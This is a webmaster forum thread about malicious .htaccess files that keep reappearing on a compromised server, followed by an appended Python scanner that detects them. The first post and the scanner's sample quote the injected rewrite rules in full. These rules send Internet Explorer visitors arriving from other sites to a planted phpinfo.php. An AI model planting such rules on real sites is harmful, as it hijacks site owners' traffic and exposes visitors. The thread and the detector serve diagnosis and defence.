Anyone encountered this htaccess problem?

  • conex
    Confirmed User
    • Dec 2002
    • 212

    #1

    Hello.

    On one of my servers I've been having this weird problem in the last few days.
    I keep getting these damn htaccess files on the root of my domain, inside them I see this:

    RewriteEngine On
    RewriteBase /
    RewriteRule ^$ index.shtml
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteCond %{REQUEST_FILENAME} !phpinfo.php
    RewriteCond %{HTTP_USER_AGENT} ^.*MSIE.* [NC]
    RewriteCond %{HTTP_REFERER} ^http:// [NC]
    RewriteCond %{HTTP_REFERER} !www.whopers .com [NC] (for example)
    RewriteRule ^(.*)\.(php|html|htm|shtml)$ phpinfo.php?a=$1&b=$2&c=%{QUERY_STRING} [L]
    RewriteRule ^js.js$ phpinfo.php?d=js [L]

    Also a phpinfo.php is created, mostly on the root of the domain. This damn htaccess file is messing with my trading script, I miss a lot of hits from my trades and I see in my script a HUGE amount of blocked traffic (I use atx).

    This happens only on 1 server, and no matter how much I try to delete those files they simply come back, we couldn't track down what makes the files.
    In the logs we see the file is created by the www user, which can be anything really. I am using arrow trader extreme and auto gallery sql on my server so I can't figure out what causes this.

    If any of you ever encountered such a problem or have a clue about the cause, please let me know.

    Thanks ( icq 7247214 )
  • underthecovers
    Registered User
    • Sep 2003
    • 74

    #2
    Man, you have a hacker on your machine. Either a script is set up to automatically replace the .htaccess if you delete it, or he/she is coming back every time and replacing it.

    Too many things to look for to tell you how it's happening, but it is happening.

    You may need your sysadmin to get into it and find out how and why.
    Some bulletin boards are full of security holes so that's my very first guess, especially since phpinfo.php keeps getting created. The hacker is using that to determine what functionality your machine has.

    God knows what else he's doing.

    You may also need a complete re-install to delete the virus if that's causing it.

    Good luck I don't envy you
    Justcamming.Com Webcam Community
    Rebel Strip Poker
    The Best Text Links Are Managed Links (adult friendly)
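
A defender-side check for the pattern quoted in post #1, as an added example that is not part of the thread: it flags any .htaccess whose RewriteRule passes the requested page to a PHP script only when HTTP_REFERER or HTTP_USER_AGENT conditions match. The function names and the placeholder domain in the sample are assumptions of this example.

```python
import os
import re

COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
VISITOR_VARS = ("%{HTTP_REFERER}", "%{HTTP_USER_AGENT}")

# Constructed sample: the rules quoted in post #1, with a placeholder domain.
SAMPLE = r"""RewriteEngine On
RewriteRule ^$ index.shtml
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !phpinfo.php
RewriteCond %{HTTP_USER_AGENT} ^.*MSIE.* [NC]
RewriteCond %{HTTP_REFERER} ^http:// [NC]
RewriteCond %{HTTP_REFERER} !www.example.com [NC]
RewriteRule ^(.*)\.(php|html|htm|shtml)$ phpinfo.php?a=$1&b=$2&c=%{QUERY_STRING} [L]
RewriteRule ^js.js$ phpinfo.php?d=js [L]
"""

def suspicious_rules(text):
    """Return (line_no, script, gating_vars) for each RewriteRule that passes the
    requested page to a PHP script only when referer/user-agent conditions match."""
    findings, conds = [], []
    for no, line in enumerate(text.splitlines(), 1):
        cond, rule = COND.match(line), RULE.match(line)
        if cond:
            conds.append(cond.group(1).upper())
        elif rule:
            target = rule.group(2)
            script = re.match(r"([\w./-]+\.php)\?", target, re.I)
            gated = [v for v in VISITOR_VARS if v in conds]
            if script and gated and re.search(r"\$\d", target):
                findings.append((no, script.group(1), gated))
            conds = []  # conditions bind only to the next RewriteRule
    return findings

def scan(root):
    """Map each .htaccess under root to its suspicious rules, if any."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, errors="replace") as fh:
                hits[path] = suspicious_rules(fh.read())
    return {p: f for p, f in hits.items() if f}

if __name__ == "__main__":
    print(suspicious_rules(SAMPLE))
```

Ordinary hotlink protection (a referer condition followed by a rule that only denies the request) is not flagged, because the rule must also rewrite to a PHP script and pass it the captured path.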
